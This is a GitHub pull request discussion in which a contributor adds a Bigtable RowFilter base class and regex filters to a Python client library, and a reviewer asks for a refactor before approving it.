Adding Bigtable RowFilter base class. #1291
Conversation
@tseaver I'm going to start with just two here.
(force-pushed from 15b001d to 559772b)
@tseaver PTAL. I opted not to have the regex filters inherit from a parent, but they also ended up having identical unit tests, so maybe it would have been worth it? I figured it was unnecessary since the classes do so little. (FWIW, of the 19 filters, 4 are regex filters.)
If four of the filters take only a …
OK. Will re-factor. |
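The refactor agreed on above might be sketched roughly like this: the four regex filters share an identical constructor and equality check, so they can inherit from a common parent. The class and attribute names here are illustrative, not necessarily the exact ones in `row.py`:

```python
class _RegexFilter(object):
    """Shared parent for filters that match a cell attribute against a regex.

    Illustrative sketch only; holds the one piece of state (the regex)
    and the equality check that the concrete regex filters all duplicate.
    """

    def __init__(self, regex):
        self.regex = regex

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return other.regex == self.regex


class RowKeyRegexFilter(_RegexFilter):
    """Matches cells whose row key (bytes) matches the regex."""


class FamilyNameRegexFilter(_RegexFilter):
    """Matches cells whose column family name (string) matches the regex."""
```

Because `__eq__` checks `self.__class__`, two filters of different concrete types never compare equal even with the same regex, which keeps the per-class unit tests meaningful.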
(force-pushed from 559772b to e1fe6a4)
@tseaver PTAL. I added …
Review comments on gcloud/bigtable/row.py (outdated; marked as spam).
Also adding regex filters for a row key (bytes) and a family name (string). These come from https://github.com/GoogleCloudPlatform/cloud-bigtable-client/blob/6a498cd3e660c7ed18299e980c1658d67661e69b/bigtable-protos/src/main/proto/google/bigtable/v1/bigtable_data.proto#L321-L404

In addition to more classes for primitive properties, parent classes are forthcoming to handle the non-primitive cases of filter Chain, Interleave and Condition (ternary).

Also renaming some redundant unit test names in test_column_family.py and ditching use of NotImplementedError in bigtable base classes (for both GC rule and row filter).
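The last change mentioned above, ditching `NotImplementedError` in the base classes, might look roughly like the sketch below: instead of a "virtual" base class whose serialization method raises `NotImplementedError`, the base class simply omits the method, since a subclass that forgets to define it fails just as loudly with an `AttributeError`. The method name `to_pb` and the dict return value are illustrative stand-ins, not the library's exact API:

```python
class RowFilter(object):
    """Base class for Bigtable row filters.

    Deliberately defines no virtual methods: there is no to_pb() stub
    raising NotImplementedError, so calling to_pb() on a subclass that
    failed to implement it raises AttributeError on its own.
    """


class SinkFilter(RowFilter):
    """Outputs all cells directly to the output of the read."""

    def to_pb(self):
        # Real code would build a protobuf message here; a plain dict
        # stands in for the protobuf so this sketch stays self-contained.
        return {'sink': True}
```

The upside is less boilerplate in the base class and in its unit tests; the downside is that the "required override" contract is documented rather than enforced.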
(force-pushed from e1fe6a4 to e3c046f)
@tseaver PTAL. I dropped all the virtual …
LGTM |